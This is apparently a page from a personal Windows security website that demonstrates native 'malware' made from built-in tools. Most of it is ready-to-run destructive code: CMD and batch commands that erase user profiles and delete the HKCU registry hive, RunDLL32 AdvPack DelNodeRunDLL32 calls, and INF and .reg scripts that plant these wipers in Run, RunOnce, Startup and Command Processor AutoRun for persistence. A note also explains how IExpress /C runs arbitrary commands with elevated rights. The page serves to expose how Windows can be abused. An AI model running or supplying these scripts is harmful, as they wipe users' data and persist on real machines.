Me, myself & IT

Mal(icious Soft)ware Evading Detection

Motivation
Examples for native malware: Direct action, immediate execution; Direct action, but deferred execution; Indirect action, immediate execution

Motivation

� Here be dragons (latin hic sunt dracones) �

Examples for native malware

� (t.b.s.) �

Direct action, immediate execution

Via start menu Run:

CMD.EXE /D /K ERASE /S "%ALLUSERSPROFILE%"
CMD.EXE /D /K RMDIR /S "%ALLUSERPROFILE%"
CMD.EXE /D /K ERASE /S "%USERPROFILE%"
CMD.EXE /D /K RMDIR /S "%USERPROFILE%"
RUNDLL32.EXE ADVPACK.DLL,DelNodeRunDLL32 "%USERPROFILE%",1
REG.EXE DELETE HKCU
REG.EXE DELETE HKCU /VE 0<NUL:

Via batch script MALWARE.BAT or MALWARE.CMD:

Rem Don't use this at home, kids!

Erase /S "%ALLUSERPROFILE%"
RmDir /S "%ALLUSERPROFILE%"
Erase /S "%USERPROFILE%"
RmDir /S "%USERPROFILE%"
"%SystemRoot%\System32\RunDLL32.exe" "%SystemRoot%\System32\AdvPack.dll",DelNodeRunDLL32 "%USERPROFILE%",1
"%SystemRoot%\System32\Reg.exe" DELETE HKCU
"%SystemRoot%\System32\Reg.exe" DELETE HKCU /VE 0<NUL:
Exit /B

Note: batch scripts are processed by Windows Command Processor %SystemRoot%\System32\Cmd.exe alias %ComSpec% which runs with the credentials and privileges of its caller.

Via setup script MALWARE.INF:

; Copyright © 2004-2024, Stefan Kanthak <‍stefan‍.‍kanthak‍@‍nexgo‍.‍de‍>

[Version]
Provider  = "Stefan Kanthak"
Signature = "$Chicago$"

[DefaultInstall]
AddReg = AddReg

[DefaultInstall.NT]
AddReg = AddReg.NT

[AddReg]
HKLM,"SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Setup","Don't run this at home, kids!",0,"%10%\RunDLL32.exe %11%\AdvPack.dll,DelNodeRunDLL32 ""%53%"",1"

[AddReg.NT]
HKLM,"SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Setup","Don't run this at home, kids!",0,"%11%\RunDLL32.exe %11%\AdvPack.dll,DelNodeRunDLL32 ""%53%"",1"

Note: in Microsoft^® Windows Vista^® and newer versions of Windows^™ NT, setup scripts are ~~opened~~ processed by %SystemRoot%\System32\InfDefaultInstall.exe; due to its embedded Application Manifest this executable requests administrative privileges!

To process setup scripts without administrative privileges, the command lines

"%SystemRoot%\System32\RunDLL32.exe" "%SystemRoot%\System32\AdvPack.dll",LaunchINFSection ‹.INF script›[,‹section›]
"%SystemRoot%\System32\RunDLL32.exe" "%SystemRoot%\System32\AdvPack.dll",LaunchINFSectionEx ‹.INF script›[,[‹section›][,[‹.CAB archive›][,[‹flags›][,{A|I|N}]]]]
"%SystemRoot%\System32\RunDLL32.exe" "%SystemRoot%\System32\SetupAPI.dll",InstallHinfSection ‹section› ‹mode› ‹.INF script›

documented in the MSDN articles LaunchINFSection(), LaunchINFSectionEx() and InstallHinfSection() can be used.

Direct action, but deferred execution

Via setup script MALWARE.INF:

; Copyright © 2004-2024, Stefan Kanthak <‍stefan‍.‍kanthak‍@‍nexgo‍.‍de‍>

[Version]
Provider  = "Stefan Kanthak"
Signature = "$Chicago$"

[DefaultInstall]
AddReg = AddReg

[DefaultInstall.NT]
AddReg = AddReg.NT

[AddReg]
HKCU,"Software\Microsoft\Windows\CurrentVersion\Run","Don't run this at home, kids!",0,"%10%\RunDLL32.exe %11%\AdvPack.dll,DelNodeRunDLL32 ""%53%"",1"

[AddReg.NT]
HKCU,"Software\Microsoft\Windows\CurrentVersion\Run","Don't run this at home, kids!",0,"%11%\RunDLL32.exe %11%\AdvPack.dll,DelNodeRunDLL32 ""%53%"",1"

HKCU,"Software\Microsoft\Command Processor","AutoRun",0,"Erase /S ""%USERPROFILE%"""

HKCU,"Environment","UserInitMPRLogonScript",0,"%11%\RunDLL32.exe %11%\AdvPack.dll,DelNodeRunDLL32 ""%53%"",1"

Note: in Windows Vista and newer versions of Windows NT, setup scripts are processed by %SystemRoot%\System32\InfDefaultInstall.exe; due to its embedded application manifest this executable requests administrative privileges!

Via setup script MALWARE.INF:

; Copyright © 2004-2024, Stefan Kanthak <‍stefan‍.‍kanthak‍@‍nexgo‍.‍de‍>

[Version]
Provider  = "Stefan Kanthak"
Signature = "$Chicago$"

[DefaultInstall]
UpdateInis = UpdateInis

[DefaultInstall.NT]
UpdateInis = UpdateInis.NT

[UpdateInis]
%16420%\Setup.ini,"ProgMan.Groups",,"Startup=%16391%"

%16420%\Setup.ini,"Startup",,"""Don't run this at home, kids!"",""%16420%\RunDLL32.exe %16421%\AdvPack.dll,DelNodeRunDLL32 """"%16424%"""",1"""

[UpdateInis.NT]
%16420%\Setup.ini,"ProgMan.Groups",,"Startup=%16391%"

%16420%\Setup.ini,"Startup",,"""Don't run this at home, kids!"",""%16421%\RunDLL32.exe %16421%\AdvPack.dll,DelNodeRunDLL32 """"%16424%"""",1"""

%16420%\Setup.ini,"ProgMan.Groups",,"Common Startup=%16408%"

%16420%\Setup.ini,"Common Startup",,"""Don't run this at home, kids!"",""%16421%\Cmd.exe /K Erase """"%USERPROFILE%"""""""

Via setup script MALWARE.INF MALWARE.INF:

; Copyright © 2004-2024, Stefan Kanthak <‍stefan‍.‍kanthak‍@‍nexgo‍.‍de‍>

[Version]
Provider  = "Stefan Kanthak"
Signature = "$Chicago$"

[DefaultInstall]
ProfileItems = ProfileItem.Common

[DefaultInstall.NT]
ProfileItems = ProfileItem.Common.NT, ProfileItem.NT

[ProfileItem.Common]
CmdLine = 10, , "RunDLL32.exe %11%\AdvPack.dll,DelNodeRunDLL32 ""%53%"",1"
Name    = "Don't run this at home, kids!", 1
SubDir  = "%Startup%"

[ProfileItem.Common.NT]
CmdLine = 11, , "RunDLL32.exe %11%\AdvPack.dll,DelNodeRunDLL32 ""%53%"",1"
Name    = "Don't run this at home, kids!", 1
SubDir  = "%Startup%"

[ProfileItem.NT]
CmdLine = 11, , "Cmd.exe /K Erase ""%USERPROFILE%"""
Name    = "Don't run this at home, kids!", 0
SubDir  = "%Startup%"

[Strings.0000] ; neutral
Startup = "Startup"

…

[Strings.0007] ; german
Startup = "Autostart"

…

[Strings.0009] ; english
Startup = "Startup"

[Strings.000A] ; spanish
Startup = "Iniciar"

…

[Strings.000C] ; french
Startup = "Démarrage"

…

[Strings.0016] ; portuguese
Startup = "Iniciar"

…

Via Registry Editor (.reg) script MALWARE.REG:

REGEDIT4

; Copyright © 2004-2024, Stefan Kanthak <‍stefan‍.‍kanthak‍@‍nexgo‍.‍de‍>

[HKEY_CURRENT_USER\Environment]
"UserInitMPRLogonScript"="RunDLL32.exe AdvPack.dll,DelNodeRunDLL32 .,1"

[HKEY_CURRENT_USER\Software\Microsoft\Command Processor]
"AutoRun"="Erase /S \"%USERPROFILE%\""

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"Don't run this at home, kids!"="RunDLL32.exe AdvPack.dll,DelNodeRunDLL32 .,1"

…

Note: Registry Editor scripts are processed by %SystemRoot%\RegEdit.exe; due to its embedded application manifest this executable runs in standard user accounts and the Administrator account with its caller’s credentials and privileges, requests but administrative privileges in protected administrator accounts!

Indirect action, immediate execution

Via IExpress package, for example and as demonstration created per setup script MALWARE.INF.
Note: as documented in the MSKB article Command-line switches for IExpress software update packages or the TechNet article IExpress command-line options
```
‹IExpress package›.exe /C:"‹arbitrary command line›"
```
can be (ab)used to run an arbitrary command line.
Note: due to its installer detection Windows’ UAC requests administrative privileges for IExpress packages without embedded application manifest; the command line specified with the /C switch is then run with administrative privileges too!

Contact and Feedback

If you miss anything here, have additions, comments, corrections, criticism or questions, want to give feedback, hints or tipps, report broken links, bugs, deficiencies, errors, inaccuracies, misrepresentations, omissions, shortcomings, vulnerabilities or weaknesses, …: don’t hesitate to contact me and feel free to ask, comment, criticise, flame, notify or report!

Use the X.509 certificate to send S/MIME encrypted mail.

Note: email in weird format and without a proper sender name is likely to be discarded!

I dislike HTML (and even weirder formats too) in email, I prefer to receive plain text.
I also expect to see your full (real) name as sender, not your nickname.
I abhor top posts and expect inline quotes in replies.

Terms and Conditions

By using this site, you signify your agreement to these terms and conditions. If you do not agree to these terms and conditions, do not use this site!

The software and the documentation on this site are provided as is without any warranty, neither express nor implied.
In no event will the author be held liable for any damage(s) arising from the use of the software or the documentation.
Permission is granted to use the current version of the software and the current version of the documentation solely for personal private and non-commercial purposes.
An individuals use of the software or the documentation in his or her capacity or function as an agent, (independent) contractor, employee, member or officer of a business, corporation or organisation (commercial or non-commercial) does not qualify as personal private and non-commercial purpose.
Without written approval from the author the software or the documentation must not be used for a business, for commercial, corporate, governmental, military or organisational purposes of any kind, or in a commercial, corporate, governmental, military or organisational environment of any kind.
Redistribution of the software and the documentation is allowed only in unmodified form of its current version and free of charge.

Data Protection Declaration

This web page records no (personal) data and stores no cookies in the web browser.

The web service is operated and provided by

Telekom Deutschland GmbH
Business Center
D-64306 Darmstadt
Germany
<‍hosting‍@‍telekom‍.‍de‍>
+49 800 5252033

The web service provider stores a session cookie in the web browser and records every visit of this web site with the following data in an access log on their server(s):

the (pseudonymised) IP address;
the date and time of the request;
the URL of the requested web page or file;
the Referer and User-Agent HTTP headers sent by the web browser;
the result (success or failure) of the request;
the amount of data received and sent.